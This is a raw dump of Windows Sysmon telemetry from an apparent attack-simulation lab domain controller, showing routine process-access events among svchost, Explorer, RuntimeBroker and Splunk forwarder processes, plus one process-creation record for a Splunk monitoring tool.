14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:38.266{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000019090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:38.266{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000019099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9630-6005-7305-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9630-6005-7305-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9630-6005-7305-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:44.563{59A5CD1D-9630-6005-7305-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:45.394{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9631-6005-7405-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 